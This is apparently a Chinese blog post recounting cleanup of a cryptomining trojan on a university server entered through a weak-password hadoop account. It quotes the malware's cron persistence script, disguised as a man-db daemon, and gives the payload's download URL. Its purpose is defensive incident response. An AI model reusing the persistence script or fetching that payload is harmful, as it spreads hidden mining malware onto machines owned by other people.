好久没登服务器,今天打开mobaxterm,突然发现CPU占用60+,感觉不对劲。
htop发现systemd进程跑满了8个内核,剩下4个是0占用。
然后top 发现systemd跑了个python。
??????
通过lsof和netstat定位到进程和远程连接,确认该进程占用了大量计算资源,并和外网通信。
kill pid后,没过一会儿,又回来了。
定位到文件位置/tmp/.X12_unix/
好家伙,我server根本没桌面啊,搁这骗谁呢??
进去后有三个文件,其中的python(可执行文件,名字叫python)负责新建一个隐藏文件夹,再将主程序cp进去运行,然后删除该文件夹(这样在ps-aux中显示就是deleted)
rm -rf /tmp/.X12_unix
kill pid
CPU占用终于下来了
分析原因,近期校内扫描固定ip的现象非常严重,群晖也被暴力登录了很多次,由于服务器之前安装过hadoop集群,怀疑是私钥泄露。由于近期不再使用hadoop,重命名了.ssh下的authorized_keys
通过last查询,发现通过固定ip登录的用户名为hadoop,想起来hadoop为了方便使用设定的是弱密码,于是删除了hadoop用户。
md,删掉文件又回来了
查了auth.log,发现确实是暴力登录进来的
查看操作记录,发现了挂马的下载地址http://47.110.91.179/img/unix.tgz (切勿尝试!!)
本质是haiduc脚本修改的挖矿木马
发现该木马在cron.hourly cron.daily等cron脚本中都设置了任务
#!/bin/bash # # Start/Stop the man-db daemon # # chkconfig 2345 90 60 # description: manual page (GNU System) cp -f -r -- /bin/lvmdisk /usr/local/bin/python 2>/dev/null cd /usr/local/bin/ 2>/dev/null ./python -c >/dev/null rm -rf -- python 2>/dev/null
懒的删脚本了,直接把家给他端了
在删除/bin/lvmdisk的时候,使用lsattr发现上了权限
sudo chattr -i lvmdisk
然后就可以使用rm删除了
问题(暂时)解决
